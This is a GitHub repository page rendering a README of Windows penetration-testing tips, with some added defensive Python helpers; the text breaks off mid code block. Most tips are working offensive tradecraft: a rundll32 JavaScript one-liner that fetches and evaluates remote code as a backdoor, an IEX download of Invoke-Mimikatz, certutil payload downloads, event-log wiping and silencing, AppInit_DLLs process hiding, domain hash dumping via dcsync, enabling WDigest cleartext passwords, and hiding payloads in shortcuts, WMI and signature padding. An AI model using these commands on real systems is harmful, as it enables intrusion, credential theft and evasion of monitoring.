https://github.com/3gstudent/pentest-and-development-tips
A collection of pentest and development tips
- Host: GitHub
- URL: https://github.com/3gstudent/pentest-and-development-tips
- Owner: 3gstudent
- Created: 2017-09-07T01:07:53.000Z (over 7 years ago)
- Default Branch: master
- Last Pushed: 2022-05-26T02:51:51.000Z (over 2 years ago)
- Last Synced: 2024-10-26T11:32:39.372Z (3 months ago)
- Homepage:
- Size: 360 KB
- Stars: 1,103
- Watchers: 57
- Forks: 306
- Open Issues: 2
Metadata Files:
- Readme: README-en.md
Awesome Lists containing this project
- awesome-security-collection - **633** stars
README
# Pentest-and-Development-Tips
A collection of pentest and development tips

Author: 3gstudent
### Statement
The following techniques should not be used for illegal purposes.
---
### Tips 1. Manual port detection
Nmap's -sV can identify the service version, but in some cases the result still has to be verified by hand.
Capturing the response in Wireshark is far more cumbersome than simply talking to the port with nc.
Eg.
For port 8001, connect with nc and type a random string. You get the following result:
```
$ nc -vv localhost 8001
localhost [127.0.0.1] 8001 (?) open
asd
HTTP/1.1 400 Bad Request
Date: Fri, 25 Aug 2017 12:15:25 GMT
Server: Apache/2.4.23 (Debian)
Content-Length: 301
Connection: close
Content-Type: text/html; charset=iso-8859-1

400 Bad Request
Bad Request
Your browser sent a request that this server could not understand.
Apache/2.4.23 (Debian) Server at 127.0.0.1 Port 8001
```
From this we know it is an HTTP service: the string we sent is not a valid HTTP request, so the server answers 400 Bad Request. The Server header also tells us the web server is Apache 2.4.23 and the operating system is Debian (banner strings can be edited by the administrator, so treat them as a hint rather than proof).
Reference:
[《Notes on the Practice and Principles of Port Probing》](http://www.freebuf.com/articles/network/146087.html)
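The response above can be classified programmatically. The following Python is an added example, not code from the original README or the referenced article: it reads a raw banner the way you would read the nc output, pulls out the service type, the Server header and an OS hint, and wraps the nc-style probe (connect, wait for a greeting, otherwise send a junk line) in a function. It also handles the greeting-first case (SSH, SMTP/FTP) that the tip does not show. The sample banners are constructed for the test; the Apache one mirrors the response quoted above.

```python
import re
import socket

# Added example, not from the original README. The sample banners below are
# constructed; APACHE_400 mirrors the response shown in the tip.
APACHE_400 = (
    b"HTTP/1.1 400 Bad Request\r\n"
    b"Date: Fri, 25 Aug 2017 12:15:25 GMT\r\n"
    b"Server: Apache/2.4.23 (Debian)\r\n"
    b"Content-Length: 301\r\n"
    b"Connection: close\r\n"
    b"Content-Type: text/html; charset=iso-8859-1\r\n"
    b"\r\n"
    b"<html><body>400 Bad Request</body></html>"
)
SSH_GREETING = b"SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7\r\n"

_HTTP_STATUS = re.compile(rb"^HTTP/\d\.\d (\d{3})")


def parse_banner(raw: bytes) -> dict:
    """Classify a raw reply: an HTTP error to junk input (the tip's case), a
    greeting-first protocol (SSH/SMTP/FTP), or nothing recognisable."""
    info = {"service": "unknown", "server": None, "os_hint": None, "status": None}
    m = _HTTP_STATUS.match(raw)
    if m:
        info["service"] = "http"
        info["status"] = int(m.group(1))
        head = raw.split(b"\r\n\r\n", 1)[0]
        for line in head.split(b"\r\n")[1:]:
            name, _, value = line.partition(b":")
            if name.strip().lower() == b"server":
                info["server"] = value.strip().decode("latin-1")
    elif raw.startswith(b"SSH-"):
        info["service"] = "ssh"
        info["server"] = raw.splitlines()[0].decode("latin-1")
    elif re.match(rb"^220[ -]", raw):
        info["service"] = "smtp/ftp"          # both greet with 220; the text says which
        info["server"] = raw.splitlines()[0][4:].decode("latin-1")
    if info["server"]:
        # "Apache/2.4.23 (Debian)" or "OpenSSH_7.4p1 Debian-..." -> OS hint. Banners can
        # be edited by the administrator, so this is a hint, not proof.
        os_m = re.search(r"\((\w[^)]*)\)|\b(Debian|Ubuntu|CentOS|FreeBSD|Win32)\b", info["server"])
        if os_m:
            info["os_hint"] = os_m.group(1) or os_m.group(2)
    return info


def probe(host: str, port: int, timeout: float = 3.0, bait: bytes = b"asd\r\n") -> dict:
    """What `nc -vv host port` plus typing a junk line does: wait for a greeting,
    otherwise send bait and read the reply, then classify it."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        data = b""
        try:
            data = s.recv(4096)                    # greeting-first protocols answer here
        except socket.timeout:
            s.sendall(bait)                        # silent service: provoke an error reply
            try:
                data = s.recv(4096)
            except socket.timeout:
                pass
    return parse_banner(data)
```

`probe("127.0.0.1", 8001)` reproduces the nc session against a live target; `parse_banner` alone works on anything captured earlier, which is the part worth keeping in a toolkit.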
---
### Tips 2. Download files from Kali to windows
Kali:
```
python -m SimpleHTTPServer 80
```
(On Python 3 the equivalent is `python3 -m http.server 80`.)
Windows:
```
certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe 1.exe
certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe delete
```
The second command removes the copy that certutil cached on disk, which would otherwise remain after 1.exe is deleted.
Reference:
[《certutil.exe in Penetration Testing》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84certutil.exe)
---
### Tips 3. Configure the computer in WORKGROUP to support the IPC connection
Add user:
```
net user test test /add
net localgroup administrators test /add
```
Modify the registry so that local administrator accounts receive a full (unfiltered) token over the network:
```
reg add hklm\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
```
IPC connection from the remote host:
```
net use \\192.168.1.195\ipc$ test /user:test
```
Without LocalAccountTokenFilterPolicy=1, remote UAC strips the administrative privileges from the network token of any local account other than the built-in Administrator, so the IPC$ session is established but admin shares and remote administration fail with access denied.
---
### Tips 4. Cleanup the Windows XML Event Log(evtx)
Get a list of evtx log categories:
```
wevtutil el >1.txt
```
Get statistics for a single evtx log category:
Eg.
```
wevtutil gli "windows powershell"
```
Output:
```
creationTime: 2016-11-28T06:01:37.986Z
lastAccessTime: 2016-11-28T06:01:37.986Z
lastWriteTime: 2017-08-08T08:01:20.979Z
fileSize: 1118208
attributes: 32
numberOfLogRecords: 1228
oldestRecordNumber: 1
```
View the full content of the specified evtx log:
```
wevtutil qe /f:text "windows powershell"
```
Show only the specified number of records:
```
wevtutil qe /f:text "windows powershell" /c:20
```
Delete all records of a single log category:
```
wevtutil cl "windows powershell"
```
Note that clearing a log is itself logged: clearing the Security log writes event 1102 into it, and clearing any other log writes event 104 to the System log, so a SIEM that forwards events will still see the wipe.
Reference:
[《Penetration Technique: Deleting and Bypassing Windows Logs》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E6%97%A5%E5%BF%97%E7%9A%84%E5%88%A0%E9%99%A4%E4%B8%8E%E7%BB%95%E8%BF%87)
Remove individual records from Windows XML Event Log (EVTX) files:
[《Penetration Technique: Deleting a Single Windows Log Record》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E5%8D%95%E6%9D%A1%E6%97%A5%E5%BF%97%E7%9A%84%E5%88%A0%E9%99%A4)
---
### Tips 5. Disable the Event Log service without stopping it
Calling TerminateThread on the threads that implement logging inside the Event Log service process stops events from being recorded, while the Windows Event Log service itself is not stopped and still reports a state of Running.
Powershell:
https://github.com/hlldz/Invoke-Phant0m
C++:
https://github.com/3gstudent/Windwos-EventLog-Bypass
Reference:
[《Penetration Technique: Deleting and Bypassing Windows Logs》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E6%97%A5%E5%BF%97%E7%9A%84%E5%88%A0%E9%99%A4%E4%B8%8E%E7%BB%95%E8%BF%87)
[《Using NtQueryInformationThread and I_QueryTagInformation to Bypass Windows Log Monitoring》](https://3gstudent.github.io/%E5%88%A9%E7%94%A8API-NtQueryInformationThread%E5%92%8CI_QueryTagInformation%E5%AE%9E%E7%8E%B0%E5%AF%B9Windwos%E6%97%A5%E5%BF%97%E7%9B%91%E6%8E%A7%E7%9A%84%E7%BB%95%E8%BF%87)
---
### Tips 6. Process hiding under Win7 and Windows Server 2008 R2
Use a global API hook DLL, loaded into every process that loads user32.dll through the AppInit_DLLs registry value.
Download project: https://github.com/subTee/AppInitGlobalHooks-Mimikatz
Modify the code to specify the program name to hide, cldr.exe, compile it into cldr.dll, and place cldr.dll in `C:\ProgramData\Microsoft\HelpLibrary\`
Administrator privileges:
```
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0 /f
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 1 /f
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d "C:\\ProgramData\\Microsoft\\HelpLibrary\\cldr.dll" /f
```
At this point cldr.exe no longer appears in the Task Manager process list, in Process Explorer, or in the output of tasklist.exe.
For 64-bit systems:
The 64-bit build (cldrx64.dll) is registered under the native key, which governs 64-bit processes, and the 32-bit build (cldr.dll) under the Wow6432Node key, which governs 32-bit processes; both keys need LoadAppInit_DLLs enabled and the signing requirement disabled.
Administrator privileges:
```
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0 /f
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 1 /f
reg add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d "C:\\ProgramData\\Microsoft\\HelpLibrary\\cldrx64.dll" /f
reg add "hklm\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0 /f
reg add "hklm\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 1 /f
reg add "hklm\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d "C:\\ProgramData\\Microsoft\\HelpLibrary\\cldr.dll" /f
```
Reference:
[《Hiding Processes on Win7 with Global API Hooks》](https://3gstudent.github.io/%E5%88%A9%E7%94%A8globalAPIhooks%E5%9C%A8Win7%E7%B3%BB%E7%BB%9F%E4%B8%8B%E9%9A%90%E8%97%8F%E8%BF%9B%E7%A8%8B)
---
### Tips 7. Execution order of exe and com files with the same name
If a directory contains both an exe and a com file with the same base name, such as test.exe and test.com, entering `test` (without the extension) on the command line runs the com file first: cmd.exe tries the extensions listed in the PATHEXT variable in order, and the default value (`.COM;.EXE;.BAT;.CMD;...`) puts .COM ahead of .EXE.
A "COM" file for this purpose is produced simply by renaming the exe file's extension to com; the loader inspects the PE header, not the extension.
Reference:
《A dirty way of tricking users to bypass UAC》
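The resolution order can be modelled and, more usefully, audited. The following Python is an added example, not code from the original README or the referenced article: `resolve_command` reproduces how cmd.exe picks a file for a bare command name (current directory first, then each PATH entry, trying PATHEXT extensions in order), and `find_shadowed_exes` is the check a reviewer would run over a directory listing to find a .com planted beside a .exe. The directory listing is constructed for the test; nothing on disk is read.

```python
import os
from typing import Dict, List, Optional, Set, Tuple

# Added example, not from the original README. cmd.exe resolves a bare command
# name by trying, in each directory it searches, the extensions listed in
# PATHEXT in order; the default value puts .COM ahead of .EXE. The listings
# below are constructed for the test.
DEFAULT_PATHEXT = ".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC"

Listing = Dict[str, Set[str]]   # directory -> names of the files it contains


def resolve_command(name: str, search_dirs: List[str], listing: Listing,
                    pathext: str = DEFAULT_PATHEXT) -> Optional[str]:
    """Return the file cmd.exe would launch for `name`, or None if not found.

    `search_dirs` should be the current directory followed by the PATH entries,
    in that order. Matching is case-insensitive, as on NTFS. A name that already
    carries an extension is tried as typed before the PATHEXT variants.
    """
    exts = [e for e in pathext.split(";") if e]
    candidates = ([name] if os.path.splitext(name)[1] else []) + [name + e for e in exts]
    for d in search_dirs:
        on_disk = {f.lower(): f for f in listing.get(d, set())}
        for cand in candidates:
            if cand.lower() in on_disk:
                return d.rstrip("\\") + "\\" + on_disk[cand.lower()]
    return None


def find_shadowed_exes(listing: Listing) -> List[Tuple[str, str, str]]:
    """Audit check: (directory, com, exe) triples where a .com file sits beside a
    .exe of the same base name, i.e. where typing the bare name runs the .com."""
    hits = []
    for d, files in sorted(listing.items()):
        lower = {f.lower(): f for f in files}
        for f in sorted(files):
            base, ext = os.path.splitext(f)
            twin = (base + ".com").lower()
            if ext.lower() == ".exe" and twin in lower:
                hits.append((d, lower[twin], f))
    return hits


# Constructed listing: a test.com has been dropped next to a legitimate test.exe.
SAMPLE_LISTING: Listing = {
    r"C:\tools": {"test.exe", "test.com", "other.exe"},
    r"C:\Windows\System32": {"calc.exe"},
}
SAMPLE_PATH = [r"C:\tools", r"C:\Windows\System32"]
```

On a real host, feed `find_shadowed_exes` the contents of every PATH directory and of user-writable directories that scripts run from; a .com beside a .exe is almost never legitimate on a modern system.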
---
### Tips 8. Windows system certificate generation and registration
Certificate generation and signature:
```
makecert -n "CN=Microsoft Windows" -r -sv Root.pvk Root.cer
cert2spc Root.cer Root.spc
pvk2pfx -pvk Root.pvk -pi 12345678password -spc Root.spc -pfx Root.pfx -f
signtool sign /f Root.pfx /p 12345678password test.exe
```
This generates four files, Root.cer, Root.pfx, Root.pvk and Root.spc, and test.exe is digitally signed with the self-issued certificate.
Certificate registration:
Add the certificate to the LocalMachine Root store (Administrator privileges), after which the signature chains to a trusted root on that machine:
```
certmgr.exe -add -c Root.cer -s -r localmachine root
```
Reference:
《A dirty way of tricking users to bypass UAC》
---
### Tips 9. Use an HTML Application (hta) to run VBScript, and then use the VBScript to run a PowerShell script
test.hta (the VBScript has to sit inside a script element for mshta.exe to execute it; the -E argument is a base64-encoded UTF-16LE command, here `calc.exe`):
```
<script language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
Connect="powershell -nop -windows hidden -E YwBhAGwAYwAuAGUAeABlAA=="
WshShell.Run Connect, 4, true
</script>
```
Reference:
《Bypass McAfee Application Control——Code Execution》
---
### Tips 10. Write dll by c# and load dll via rundll32.exe or regsvr32
By default, C# cannot declare exported functions, but this can be done by adding the UnmanagedExports NuGet package (DllExport attribute).
Of course, a DLL written in C# needs the matching version of the .NET runtime to be present on the target; a DLL written in C++ is more portable.
The DLL can be loaded by rundll32.exe or regsvr32, but each loader requires a specific export: rundll32 calls whatever function is named on the command line (`rundll32 test.dll,Entry`), while regsvr32 calls DllRegisterServer (DllUnregisterServer with /u, or DllInstall with /i).
Reference:
《Code Execution of Regsvr32.exe》
---
### Tips 11. Introduction to cpl file under Windows
Essentially a DLL with the suffix .cpl and an exported function CPLApplet.
Five ways to run it:
(1) Double click to run directly
(2) cmd
```
rundll32 shell32.dll,Control_RunDLL test.cpl
```
(3) cmd
```
control test.cpl
```
(4) vbs
```
Dim obj
Set obj = CreateObject("Shell.Application")
obj.ControlPanelItem("test.cpl")
```
(5) js
```
var a = new ActiveXObject("Shell.Application");
a.ControlPanelItem("c:\\test\\test.cpl");
```
Reference:
《An Introduction to Exploiting CPL Files》
---
### Tips 12. Use rundll32 via cmd to execute a piece of code to get a shell of Windows
Server:
https://github.com/3gstudent/Javascript-Backdoor/blob/master/JSRat.ps1
Client:
```
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");w=new%20ActiveXObject("WScript.Shell");try{v=w.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet%20Settings\\ProxyServer");q=v.split("=")[1].split(";")[0];h.SetProxy(2,q);}catch(e){}h.Open("GET","http://192.168.174.131/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
```
Of course, the RAT tool can also be loaded by:
- vbs
- js
- exe
- dll
- shellcode

Reference:
《JavaScript Backdoor》
《JavaScript Phishing》
---
### Tips 13. PuTTY and Pageant private keys can be recovered from a memory dump
Applies to both Windows and Linux
Reference:
《Memory Dump Exploitation Examples》
---
### Tips 14. Phishing for Visual Studio
Visual C++:
- Modify the .vcxproj file
Visual Basic:
- Modify the .vbproj file
Visual F#:
- Modify the .fsproj file

Any of the above projects can execute arbitrary code when it is built with Visual Studio: the project file is an MSBuild script, so a target or build event placed in it runs whatever command it contains.
Reference:
《Pay close attention to your download code——Visual Studio trick to run code when building》
---
### Tips 15. When a 32-bit program runs on 64-bit Windows, its registry and file operations are redirected
For registry operations:
Accessing HKLM\Software\ actually reaches HKLM\Software\Wow6432Node\
For file operations:
Accessing c:\windows\Sysnative\ actually reaches c:\windows\system32\ (the real 64-bit directory)
Accessing c:\windows\system32\ actually reaches c:\windows\SysWOW64\
Sysnative is a virtual directory visible only to 32-bit processes; a thread can also switch file redirection off with Wow64DisableWow64FsRedirection, and a 32-bit program can reach the 64-bit registry view by opening keys with the KEY_WOW64_64KEY flag.
Reference:
《Redirection Issues to Note When Running 32-bit Programs on 64-bit Systems》
---
### Tips 16. Dump all the hash of the domain user from the domain controller
#### Method 1:
Copy ntds.dit:
Use NinjaCopy, https://github.com/3gstudent/NinjaCopy (Author: Joe Bialek, Twitter: @JosephBialek)
Dump hash:
Use quarkspwdump, https://github.com/quarkslab/quarkspwdump
```
esentutl /p /o ntds.dit
QuarksPwDump.exe -dhb -hist -nt c:\test\ntds.dit -o c:\test\log.txt
```
(`esentutl /p` repairs the copied database, which is usually in a dirty-shutdown state because it was copied while in use.)
#### Method 2:
Use the DSInternals PowerShell module, https://www.dsinternals.com/wp-content/uploads/DSInternals_v2.8.zip
Requirements:
Windows PowerShell 3.0 or later
.NET Framework 4.0 or later
Reference:
《A Survey of Techniques for Exporting All User Hashes in the Current Domain》
《Quickly Exporting All User Hashes from a Domain Controller with PowerShell》
#### Method 3:
mimikatz:
```
mimikatz.exe "lsadump::dcsync /domain:test.local /all /csv" exit
```
---
### Tips 17. Dump Clear-Text Password under Windows
On Windows Server 2012 (and some Windows Server 2008 systems) mimikatz cannot export clear-text passwords by default: WDigest credential caching is disabled out of the box on Windows 8.1 / Server 2012 R2, and on older systems once KB2871997 is installed.
Workaround: enable WDigest credential caching
cmd:
```
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
```
or
powershell:
```
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 1
```
After a reboot or after the user logs in again, the clear-text password can be exported (only logons that happen after the change are cached). Creation of the UseLogonCredential value is a well-known indicator and worth alerting on.
Reference:
《Domain Penetration: Dump Clear-Text Password after KB2871997 installed》
---
### Tips 18. New passwords set on a domain controller can be captured in real time by hooking PasswordChangeNotify
PasswordChangeNotify is the password-filter callback that LSASS invokes with the clear-text password on every change; the hook can save the password locally or upload it to a server.
Reference:
《Domain Penetration: Hook PasswordChangeNotify》
---
### Tips 19. Remember to pay attention to the local administrator account of the host in the domain
If the administrator has overlooked that the hosts in the domain share the same local administrator password, you can log in to the other hosts remotely with pass-the-hash. Microsoft's LAPS (Local Administrator Password Solution) exists precisely to give each host a unique, regularly rotated local administrator password.
Reference:
《Domain Penetration: Local Administrator Password Solution》
---
### Tips 20. Get the dll export function through powershell
https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Get-Exports.ps1
```
Get-Exports -DllPath c:\Windows\system32\dimsjob.dll -ExportsToCpp C:\test\export.txt
```
Reference:
[《Study Notes Weekly No.3(Use odbcconf to load dll & Get-Exports & ETW USB Keylogger)》](https://3gstudent.github.io/Study-Notes-Weekly-No.3(Use-odbcconf-to-load-dll-&-Get-Exports-&-ETW-USB-Keylogger))
---
### Tips 21. Parameter hiding tips for shortcuts
Put the payload after 260 blank (whitespace) characters: the Target field in the shortcut's Properties dialog shows only the first 260 characters, so the payload is not visible there. This hides the command inside a shortcut that the user is tricked into clicking.
Reference:
[《Penetration Technique: Hiding Parameters in Shortcut Files》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E5%BF%AB%E6%8D%B7%E6%96%B9%E5%BC%8F%E6%96%87%E4%BB%B6%E7%9A%84%E5%8F%82%E6%95%B0%E9%9A%90%E8%97%8F%E6%8A%80%E5%B7%A7)
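A defender wants the whole argument string, not the 260 characters the dialog shows. The following Python is an added example, not code from the original README or the referenced article: a minimal parser for the Shell Link (.lnk) binary format (fixed header, optional ID list and LinkInfo skipped by their sizes, then the length-prefixed string fields, as laid out in MS-SHLLINK) plus a check that flags an argument string padded with a long run of blanks and returns the hidden tail. `build_lnk` produces a constructed minimal sample carrying only the fields the parser needs; a real shortcut also has a target ID list and LinkInfo, which the parser skips by size. The command line inside the sample is constructed too.

```python
import re
import struct
from typing import Dict

# Added example, not from the original README. Layout per MS-SHLLINK: 76-byte
# ShellLinkHeader, optional LinkTargetIDList (2-byte size + data), optional
# LinkInfo (4-byte size that includes itself), then StringData fields in fixed
# order, each a 2-byte character count followed by the characters (UTF-16LE when
# the IsUnicode flag is set). `build_lnk` makes a constructed minimal sample; it
# is not a shortcut produced by Windows.
HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")   # 00021401-0000-0000-C000-000000000046
(HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH,
 HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE) = (1 << i for i in range(8))
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
                 (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"), (HAS_ICON, "icon_location"))


def parse_lnk(data: bytes) -> Dict[str, str]:
    """Return the StringData fields of a .lnk file as a dict."""
    if (len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE
            or data[4:20] != LINK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = HEADER_SIZE
    if flags & HAS_IDLIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for flag, key in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            fields[key] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[key] = data[pos:pos + count].decode("cp1252")   # ANSI code page; adjust for the host
            pos += count
    return fields


def audit_arguments(arguments: str, threshold: int = 260) -> Dict[str, object]:
    """Flag an argument string that hides text behind >= `threshold` consecutive
    blanks (the Properties dialog shows only the first 260 characters of the
    Target field). Lower `threshold` to catch less careful padding."""
    m = re.search(r"\s{%d,}" % threshold, arguments)
    return {"padded": m is not None,
            "visible": arguments[:260],                 # roughly what the dialog would show
            "hidden_tail": arguments[m.end():] if m else ""}


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Constructed minimal .lnk: header + RELATIVE_PATH + COMMAND_LINE_ARGUMENTS."""
    flags = HAS_RELPATH | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sI", HEADER_SIZE, LINK_CLSID, flags).ljust(HEADER_SIZE, b"\x00")

    def field(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + field(relative_path) + field(arguments)


# Constructed sample: a benign-looking echo, 300 blanks, then the real command (TEST-NET address).
SAMPLE_LNK = build_lnk(r"..\..\Windows\System32\cmd.exe",
                       "/c echo update" + " " * 300 + "& certutil -urlcache -f http://192.0.2.1/p.exe p.exe")
```

`parse_lnk(open(path, "rb").read())["arguments"]` on a suspicious shortcut, followed by `audit_arguments`, shows what the Properties dialog hides; the same fields are what forensic LNK parsers report, so the check transfers to their output as well.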
---
### Tips 22. 32-bit programs can remotely inject 64-bit processes
POC:
https://github.com/3gstudent/CreateRemoteThread/blob/master/CreateRemoteThread32to64.cpp
Reference:
[《Implementing Remote Injection from a 32-bit Program into a 64-bit Process》](https://3gstudent.github.io/32%E4%BD%8D%E7%A8%8B%E5%BA%8F%E5%AF%B964%E4%BD%8D%E8%BF%9B%E7%A8%8B%E7%9A%84%E8%BF%9C%E7%A8%8B%E6%B3%A8%E5%85%A5%E5%AE%9E%E7%8E%B0)
---
### Tips 23. The process needs to be downgraded in some cases
Processes running with SYSTEM privileges may encounter the following issues:
1. Unable to access the current user's desktop content
For example, the user's screen cannot be captured (a SYSTEM service runs in session 0, not in the user's interactive session)
2. The environment variables are different
Therefore it is sometimes necessary to drop privileges to the current user
#### Method 1: Use SelectMyParent.exe
https://github.com/3gstudent/From-System-authority-to-Medium-authority
Reference:
[《Penetration Technique: Launching Programs with Reduced Privileges》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E7%A8%8B%E5%BA%8F%E7%9A%84%E9%99%8D%E6%9D%83%E5%90%AF%E5%8A%A8)
#### Method 2: Use msdtc
The MSDTC service loads oci.dll with SYSTEM privileges, but if `msdtc -install` is run from an administrator command prompt instead, the DLL runs in that administrator's context: in the test it started calc.exe with the high-integrity administrator token rather than as SYSTEM.
Reference:
[《Use msdtc to maintain persistence》](https://3gstudent.github.io/Use-msdtc-to-maintain-persistence)
---
### Tips 24. WinPcap can be installed on Windows from the command line, so nmap and Masscan can be run on a host you already control
Reference:
[《Penetration Technique: Running Masscan and Nmap on Windows》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E5%B9%B3%E5%8F%B0%E8%BF%90%E8%A1%8CMasscan%E5%92%8CNmap)
---
### Tips 25. How to execute mimikatz on Windows platform
#### Method 1: Use powershell
```
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
```
#### Method 2: Use InstallUtil.exe
```
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:PELoader.exe PELoader.cs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PELoader.exe
```
Reference:
《Example of Bypassing 360 Using Whitelisted Binaries》
《More Tests on Bypassing Restrictions Using Whitelisted Binaries》
#### Method 3: Use regsvr32.exe
https://gist.githubusercontent.com/subTee/c3d5030bb99aa3f96bfa507c1c184504/raw/24dc0f93f1ebdda7c401dd3890259fa70d23f75b/regsvr32-katz.cs
Wrap mimikatz in a DLL and pass the mimikatz commands as arguments; the DLL exports EntryPoint, which rundll32 calls with the remaining arguments:
```
rundll32 katz.dll,EntryPoint log coffee exit
```
Reference:
《Code Execution of Regsvr32.exe》
#### Method 4: Use msbuild.exe
Download the xml file and save it as a.xml:
https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20mimikatz.xml
cmd:
```
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe a.xml
```
Reference:
[《Use MSBuild To Do More》](https://3gstudent.github.io/Use-MSBuild-To-Do-More)
#### Method 5: Use csi.exe
```
"C:\Program Files (x86)\MSBuild\14.0\Bin\csi.exe" c:\test\katz.csx
```
Reference:
[《Study Notes Weekly No.4(Use tracker to load dll & Use csi to bypass UMCI & Execute C# from XSLT file)》](https://3gstudent.github.io/Study-Notes-Weekly-No.4(Use-tracker-to-load-dll-&-Use-csi-to-bypass-UMCI-&-Execute-C-from-XSLT-file))
#### Method 6: Use the js/vbs script
https://gist.github.com/subTee/5c636b8736530fb20c3d
https://gist.github.com/subTee/b30e0bcc7645c790fcd993cfd0ad622f
Reference:
[《Loading .NET Programs with JS》](https://3gstudent.github.io/%E5%88%A9%E7%94%A8JS%E5%8A%A0%E8%BD%BD.Net%E7%A8%8B%E5%BA%8F)
---
### Tips 26. The location in the Windows system where you can store and read the payload.
#### Method 1: WMI
Save:
```
$StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,$null)
$StaticClass.Name = 'Win32_Command'
$StaticClass.Put()
$StaticClass.Properties.Add('Command' , $Payload)
$StaticClass.Put()
```
Read:
```
$Payload=([WmiClass] 'Win32_Command').Properties['Command'].Value
```
Reference:
《WMI Backdoor》
#### Method 2: PE file containing a digital signature
The Authenticode hash deliberately excludes the PE checksum field, the Security data-directory entry and the certificate table itself, so data appended inside the certificate table (after the PKCS#7 signature blob, with the WIN_CERTIFICATE length and the directory size enlarged to cover it) does not invalidate the file's digital signature. This is the "flaw" in the file hash the tip refers to. Microsoft's MS13-098 update added a stricter check (EnableCertPaddingCheck) that rejects such padding, but it is opt-in and off by default, so the files still verify on most systems.
Reference:
[《Steganography Technique: Hiding a Payload in a PE File's Digital Certificate》](https://3gstudent.github.io/%E9%9A%90%E5%86%99%E6%8A%80%E5%B7%A7-%E5%9C%A8PE%E6%96%87%E4%BB%B6%E7%9A%84%E6%95%B0%E5%AD%97%E8%AF%81%E4%B9%A6%E4%B8%AD%E9%9A%90%E8%97%8FPayload)
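A check for this technique, as an added example that is not code from the original README or the referenced post: locate the PE's Security data directory, walk the WIN_CERTIFICATE entries and compare each entry's declared length with the actual length of the DER-encoded PKCS#7 blob it carries; anything beyond the blob other than up to seven zero bytes of alignment padding is hidden data. `build_stub_pe` produces a headers-only PE32 skeleton with a dummy "signature" purely so the parser has input; it is not a real signed binary, and a real investigation would also confirm that the signature still verifies (signtool verify or Get-AuthenticodeSignature) to prove the padding survived signing.

```python
import struct
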